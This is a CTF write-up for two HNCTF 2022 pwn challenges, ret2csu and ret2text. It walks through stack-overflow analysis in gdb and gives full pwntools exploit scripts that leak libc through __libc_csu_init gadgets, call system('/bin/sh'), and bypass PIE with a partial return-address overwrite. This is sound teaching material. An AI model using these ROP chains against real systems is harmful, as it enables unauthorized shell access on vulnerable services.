ret2csu

[HNCTF 2022 WEEK2]ret2csu

Preparation


64-bit, only NX is enabled

Analysis

main function

int __fastcall main(int argc, const char **argv, const char **envp)
{
    setbuf(stdin, 0LL);
    setbuf(stderr, 0LL);
    setbuf(_bss_start, 0LL);
    write(1, "Start Your Exploit!\n", 0x14uLL);
    vuln();
    return 0;
}

There is a vuln function.

vuln function

ssize_t vuln()
{
    _BYTE buf[256]; // [rsp+0h] [rbp-100h] BYREF

    write(1, "Input:\n", 7uLL);
    read(0, buf, 0x200uLL);
    return write(1, "Ok.\n", 4uLL);
}

It reads at most 512 (0x200) bytes of input into buf, but buf is only 256 bytes, so there is a stack buffer overflow.

Approach:

The challenge description says this is ret2csu, so the focus is on the assembly of __libc_csu_init; once its gadgets give us control of the needed registers, it is a normal ret2libc.
The key section of __libc_csu_init's assembly:


Use gdb to get the offset

motaly@motaly-VMware-Virtual-Platform:~$ gdb csu
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from csu...

This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in csu)
------- tip of the day (disable with set show-tips off) -------
Calling functions like call (void)puts("hello world") will run all other target threads for the time the function runs. Use set scheduler-locking on to lock the execution to current thread when calling functions
pwndbg> cyclic 1000
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
pwndbg> r
Starting program: /home/motaly/csu
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Start Your Exploit!
Input:
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
Ok.

Program received signal SIGSEGV, Segmentation fault.
0x00000000004011db in vuln ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────
RAX 4
RBX 0x7fffffffd848 —▸ 0x7fffffffdc16 ◂— '/home/motaly/csu'
RCX 0x7ffff7d1c574 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
RDX 4
RDI 1
RSI 0x40200c ◂— 0x617453000a2e6b4f /* 'Ok.\n' */
R8 0x4012c0 (__libc_csu_fini) ◂— endbr64
R9 0x7ffff7fca380 (_dl_fini) ◂— endbr64
R10 0x7ffff7c109d8 ◂— 0x11001200001bd3
R11 0x202
R12 1
R13 0
R14 0
R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
RBP 0x6261616161616168 ('haaaaaab')
RSP 0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
RIP 0x4011db (vuln+101) ◂— ret
─────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────
► 0x4011db <vuln+101> ret <0x6261616161616169>
───────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
01:0008│ 0x7fffffffd720 ◂— 0x626161616161616a ('jaaaaaab')
02:0010│ 0x7fffffffd728 ◂— 0x626161616161616b ('kaaaaaab')
03:0018│ 0x7fffffffd730 ◂— 0x626161616161616c ('laaaaaab')
04:0020│ 0x7fffffffd738 ◂— 0x626161616161616d ('maaaaaab')
05:0028│ 0x7fffffffd740 ◂— 0x626161616161616e ('naaaaaab')
06:0030│ 0x7fffffffd748 ◂— 0x626161616161616f ('oaaaaaab')
07:0038│ 0x7fffffffd750 ◂— 'paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaac'
─────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
► 0 0x4011db vuln+101
1 0x6261616161616169 None
2 0x626161616161616a None
3 0x626161616161616b None
4 0x626161616161616c None
5 0x626161616161616d None
6 0x626161616161616e None
7 0x626161616161616f None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
Undefined command: "oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae". Try "help".
pwndbg> cyclic -l 0x6261616161616169
Finding cyclic pattern of 8 bytes: b'iaaaaaab' (hex: 0x6961616161616162)
Found at offset 264

The offset is 264.
Use ROPgadget to find the register gadgets

Based on the ret2csu technique, write the corresponding csu payload:

from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node5.anna.nssctf.cn',24027)
# io=process('/home/motaly/csu')
elf=ELF('/home/motaly/csu')

write_got = elf.got['write']
main_addr = 0x4011DC
csu1_addr = 0x4012A6
csu2_addr = 0x401290
rdi = 0x4012b3

def csu(r12, r13, r14, r15, last):
    payload=b'a'*264
    payload+=p64(csu1_addr)+p64(0) # add rsp,8 (skips the 0); pop rbx,rbp,r12,r13,r14,r15; ret
    payload+=p64(0)+p64(1) # rbx=0: the call goes to [r15]; rbp=1: the loop body does not run again
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15) # edi=r12d rsi=r13 rdx=r14; r15 points at the function to call
    payload+=p64(csu2_addr)
    payload+=b'a'*56+p64(last) # padding for add rsp,8 + six pops, then the final return address
    io.sendline(payload)
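To check why the padding after the second gadget is exactly 56 bytes (8 for add rsp,8 plus six 8-byte pops), here is an added example, not part of the write-up, that builds the same chain layout and walks both __libc_csu_init gadgets over it as a small emulator. The gadget addresses and main_addr are the write-up's; the GOT slot and the leaked write address are constructed stand-ins.

```python
import struct

# Gadget addresses from the write-up (the binary is not PIE); the GOT slot and the
# write address stored in it below are constructed stand-ins, not real leaks.
CSU1 = 0x4012A6   # add rsp,8; pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
CSU2 = 0x401290   # mov rdx,r14; mov rsi,r13; mov edi,r12d; call [r15+rbx*8]; add rbx,1;
                  # cmp rbp,rbx; jne CSU2; add rsp,8; pop rbx..r15; ret
OFFSET = 264      # bytes from buf to the saved return address
WRITE_GOT, WRITE_ADDR, MAIN = 0x404018, 0x7FFFF7D1C560, 0x4011DC  # constructed except MAIN

def p64(v):
    return struct.pack('<Q', v)

def csu_chain(r12, r13, r14, r15, last, pad=56):
    """Same layout as the write-up's csu() payload, returned instead of sent."""
    chain = p64(CSU1) + p64(0)                          # the 0 is skipped by add rsp,8
    chain += p64(0) + p64(1)                            # rbx=0, rbp=1: call slot 0, loop once
    chain += p64(r12) + p64(r13) + p64(r14) + p64(r15)  # edi, rsi, rdx, call-table pointer
    chain += p64(CSU2)
    chain += b'a' * pad + p64(last)                     # pad covers add rsp,8 + six pops
    return b'a' * OFFSET + chain

def emulate(payload, call_table):
    """Walk both gadgets over the overflowed stack. call_table maps an address to the
    function pointer stored there, standing in for the memory read by call [r15+rbx*8]."""
    stack = payload[OFFSET:]
    def pop():
        nonlocal stack
        if len(stack) < 8:
            raise ValueError('chain ran off the end of the payload')
        v, stack = struct.unpack('<Q', stack[:8])[0], stack[8:]
        return v
    regs, calls = {}, []
    if pop() != CSU1:                                   # the overwritten return address
        raise ValueError('return address is not the pop gadget')
    pop()                                               # add rsp,8
    for r in ('rbx', 'rbp', 'r12', 'r13', 'r14', 'r15'):
        regs[r] = pop()
    if pop() != CSU2:
        raise ValueError('pop gadget did not return into the call gadget')
    while True:                                         # do { ... } while (++rbx != rbp)
        regs['rdx'], regs['rsi'] = regs['r14'], regs['r13']
        regs['edi'] = regs['r12'] & 0xFFFFFFFF
        calls.append(call_table[regs['r15'] + regs['rbx'] * 8])
        regs['rbx'] += 1
        if regs['rbx'] >= regs['rbp']:
            break
    pop()                                               # add rsp,8
    for r in ('rbx', 'rbp', 'r12', 'r13', 'r14', 'r15'):
        regs[r] = pop()                                 # consumes the 'a' padding
    regs['rip'] = pop()                                 # the final ret
    return regs, calls

def demo():
    """The write-up's leak call: write(1, write_got, 8), then return to main."""
    return emulate(csu_chain(1, WRITE_GOT, 8, WRITE_GOT, MAIN), {WRITE_GOT: WRITE_ADDR})
```

With pad=64 instead of 56 the final ret lands on 0x6161616161616161, which is how a wrong padding shows up in the debugger.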

Then a normal ret2libc (this challenge does not need stack alignment, so no ret gadget is needed):

def csu(r12, r13, r14, r15, last):
    payload=b'a'*264
    payload+=p64(csu1_addr)+p64(0) # add rsp,8 (skips the 0); pop rbx,rbp,r12,r13,r14,r15; ret
    payload+=p64(0)+p64(1) # rbx=0: the call goes to [r15]; rbp=1: the loop body does not run again
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15) # edi=r12d rsi=r13 rdx=r14; r15 points at the function to call
    payload+=p64(csu2_addr)
    payload+=b'a'*56+p64(last) # padding for add rsp,8 + six pops, then the final return address
    io.sendline(payload)

io.recvuntil(b"Input:\n")
# write(1,write_got,8)
csu(1, write_got, 8, write_got, main_addr)

io.recvuntil(b"Ok.\n") # consume vuln's "Ok.\n" so the next bytes are the leaked GOT entry
write_addr = u64(io.recvn(6).ljust(8, b'\x00')) # recvn: exactly 6 bytes, the 2 high zero bytes are left behind
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base: ' + hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

payload=b'a'*264+p64(rdi)+p64(bin_sh)+p64(system)
io.recvuntil(b"Input:\n")
io.sendline(payload)

Script

from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node5.anna.nssctf.cn',23900)
# io=process('/home/motaly/csu')
elf=ELF('/home/motaly/csu')

write_got = elf.got['write']
main_addr = 0x4011DC
csu1_addr = 0x4012A6
csu2_addr = 0x401290
rdi = 0x4012b3

def csu(r12, r13, r14, r15, last):
    payload=b'a'*264
    payload+=p64(csu1_addr)+p64(0) # add rsp,8 (skips the 0); pop rbx,rbp,r12,r13,r14,r15; ret
    payload+=p64(0)+p64(1) # rbx=0: the call goes to [r15]; rbp=1: the loop body does not run again
    payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15) # edi=r12d rsi=r13 rdx=r14; r15 points at the function to call
    payload+=p64(csu2_addr)
    payload+=b'a'*56+p64(last) # padding for add rsp,8 + six pops, then the final return address
    io.sendline(payload)

io.recvuntil(b"Input:\n")
# write(1,write_got,8)
csu(1, write_got, 8, write_got, main_addr)

io.recvuntil(b"Ok.\n") # consume vuln's "Ok.\n" so the next bytes are the leaked GOT entry
write_addr = u64(io.recvn(6).ljust(8, b'\x00')) # recvn: exactly 6 bytes, the 2 high zero bytes are left behind
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base :'+hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

payload=b'a'*264+p64(rdi)+p64(bin_sh)+p64(system)
io.recvuntil(b"Input:\n")
io.sendline(payload)

io.interactive()

ret2text

[HNCTF 2022 WEEK2]ret2text

Preparation


64-bit, PIE is enabled

Analysis

main function

int __fastcall main(int argc, const char **argv, const char **envp)
{
    setbuf(stdin, 0LL);
    setbuf(stdout, 0LL);
    setbuf(stderr, 0LL);
    puts("Do you konw ret2text?");
    puts("It's a easy challenge");
    vuln();
    puts("You failed.");
    return 0;
}

There is a vuln function.

vuln function

__int64 vuln()
{
    _BYTE buf[256]; // [rsp+0h] [rbp-100h] BYREF

    read(0, buf, 0x140uLL);
    return 0LL;
}

It reads at most 320 (0x140) bytes of input into buf, but buf is only 256 bytes, so there is a stack buffer overflow.

backdoor function

int backdoor()
{
    return system("/bin/sh");
}

A direct target to return to.

Approach:

This challenge has a stack overflow and a direct target, but PIE is enabled, so it is a simple PIE bypass.
Use gdb to get the offset

motaly@motaly-VMware-Virtual-Platform:~$ gdb text
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from text...

This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in text)
------- tip of the day (disable with set show-tips off) -------
Use the vmmap command for a better & colored memory maps display (than the GDB's info proc mappings)
pwndbg> cyclic 500
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
pwndbg> r
Starting program: /home/motaly/text
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Do you konw ret2text?
It's a easy challenge
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa

Program received signal SIGSEGV, Segmentation fault.
0x00005555555551dc in vuln ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────────────────────────────
RAX 0
RBX 0x7fffffffd848 —▸ 0x7fffffffdc14 ◂— '/home/motaly/text'
RCX 0x7ffff7d1ba61 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
RDX 0x140
RDI 0
RSI 0x7fffffffd610 ◂— 0x6161616161616161 ('aaaaaaaa')
R8 0x15
R9 0x7ffff7fca380 (_dl_fini) ◂— endbr64
R10 0x7ffff7c109d8 ◂— 0x11001200001bd3
R11 0x246
R12 1
R13 0
R14 0
R15 0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
RBP 0x6261616161616168 ('haaaaaab')
RSP 0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
RIP 0x5555555551dc (vuln+51) ◂— ret
─────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────
► 0x5555555551dc <vuln+51> ret <0x6261616161616169>
──────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
01:0008│ 0x7fffffffd720 ◂— 0x626161616161616a ('jaaaaaab')
02:0010│ 0x7fffffffd728 ◂— 0x626161616161616b ('kaaaaaab')
03:0018│ 0x7fffffffd730 ◂— 0x626161616161616c ('laaaaaab')
04:0020│ 0x7fffffffd738 ◂— 0x626161616161616d ('maaaaaab')
05:0028│ 0x7fffffffd740 ◂— 0x626161616161616e ('naaaaaab')
06:0030│ 0x7fffffffd748 ◂— 0x626161616161616f ('oaaaaaab')
07:0038│ 0x7fffffffd750 —▸ 0x7fffffffd848 —▸ 0x7fffffffdc14 ◂— '/home/motaly/text'
────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────
► 0 0x5555555551dc vuln+51
1 0x6261616161616169 None
2 0x626161616161616a None
3 0x626161616161616b None
4 0x626161616161616c None
5 0x626161616161616d None
6 0x626161616161616e None
7 0x626161616161616f None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
Undefined command: "paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa". Try "help".
pwndbg> cyclic -l 0x6261616161616169
Finding cyclic pattern of 8 bytes: b'iaaaaaab' (hex: 0x6961616161616162)
Found at offset 264

The offset is 264.
Then use gdb to look at the relationship between the PIE base and the backdoor address.
Set a breakpoint at vuln, then run the program

Keep single-stepping with ni; when the input point is reached, give it any value

until execution reaches the end of vuln

Look at the backdoor assembly and the PIE base value
Combined with the backdoor offset from IDA

We can see that PIE base + offset = backdoor address (0x555555554000 + 0x11DD = 0x5555555551dd).
Because PIE randomizes the base, the low three hex digits 0x1DD of the backdoor address never change; what changes is the fourth digit, so any value we pick for the jump is exactly right with probability 1/16. Here we use the offset 0x11DD directly.

Combined with the hint given by the challenge that stack alignment matters, add 8 bytes for alignment, i.e. 0x11DD + 8 = 0x11E5.
Then build the ROP:

payload=b'a'*0x108+p16(0x11E5)
io.sendafter(b"It's a easy challenge",payload)
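An added example, not part of the write-up, that checks the reasoning above: a 2-byte overwrite with p16(0x11E5) only replaces the low 16 bits of the saved return address, the low 12 bits of the backdoor address are fixed by page alignment, and exactly one of the 16 possible values of the fourth hex digit makes the overwrite land. The backdoor offset 0x11DD and the +8 are the write-up's; the PIE bases and RET_OFF (where vuln returns into main) are constructed assumptions.

```python
import struct

BACKDOOR_OFF = 0x11DD   # backdoor offset inside the binary, from the write-up
ALIGN_SKIP = 8          # the write-up adds 8 to skip push rbp and keep the stack aligned
RET_OFF = 0x1250        # assumed offset of the saved return into main; any offset in the
                        # same 64 KiB window as backdoor gives the same result

def pie_base(nibble):
    """Constructed PIE base: page-aligned, with bits 12-15 (the 'fourth digit') set to
    nibble. Real ASLR also randomizes higher bits, but those are never overwritten here."""
    return 0x555555550000 | (nibble << 12)

def p16(v):
    return struct.pack('<H', v)

def overwrite_low16(saved_ret, two_bytes):
    """Sending 2 bytes over the saved return address leaves its upper 6 bytes intact."""
    low = struct.unpack('<H', two_bytes)[0]
    return (saved_ret & ~0xFFFF) | low

def low12_values():
    """Low 12 bits of the backdoor address across all bases: always 0x1DD."""
    return {(pie_base(n) + BACKDOOR_OFF) & 0xFFF for n in range(16)}

def hit(nibble, low16=BACKDOOR_OFF + ALIGN_SKIP):
    """Does the partial overwrite land on backdoor+8 for this value of the fourth digit?"""
    base = pie_base(nibble)
    new_ret = overwrite_low16(base + RET_OFF, p16(low16))
    return new_ret == base + low16

def hit_count():
    """How many of the 16 possible fourth digits make the overwrite land: 1, i.e. 1/16."""
    return sum(hit(n) for n in range(16))
```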

Script

Try a few more times here and it will connect (it may take a dozen or so attempts, so keep trying).

from pwn import *
context(os='linux',log_level = 'debug',arch='amd64')
io=remote('node5.anna.nssctf.cn',22111)
# io= process('/home/motaly/text')

payload=b'a'*0x108+p16(0x11E5)
io.sendafter(b"It's a easy challenge",payload)

io.interactive()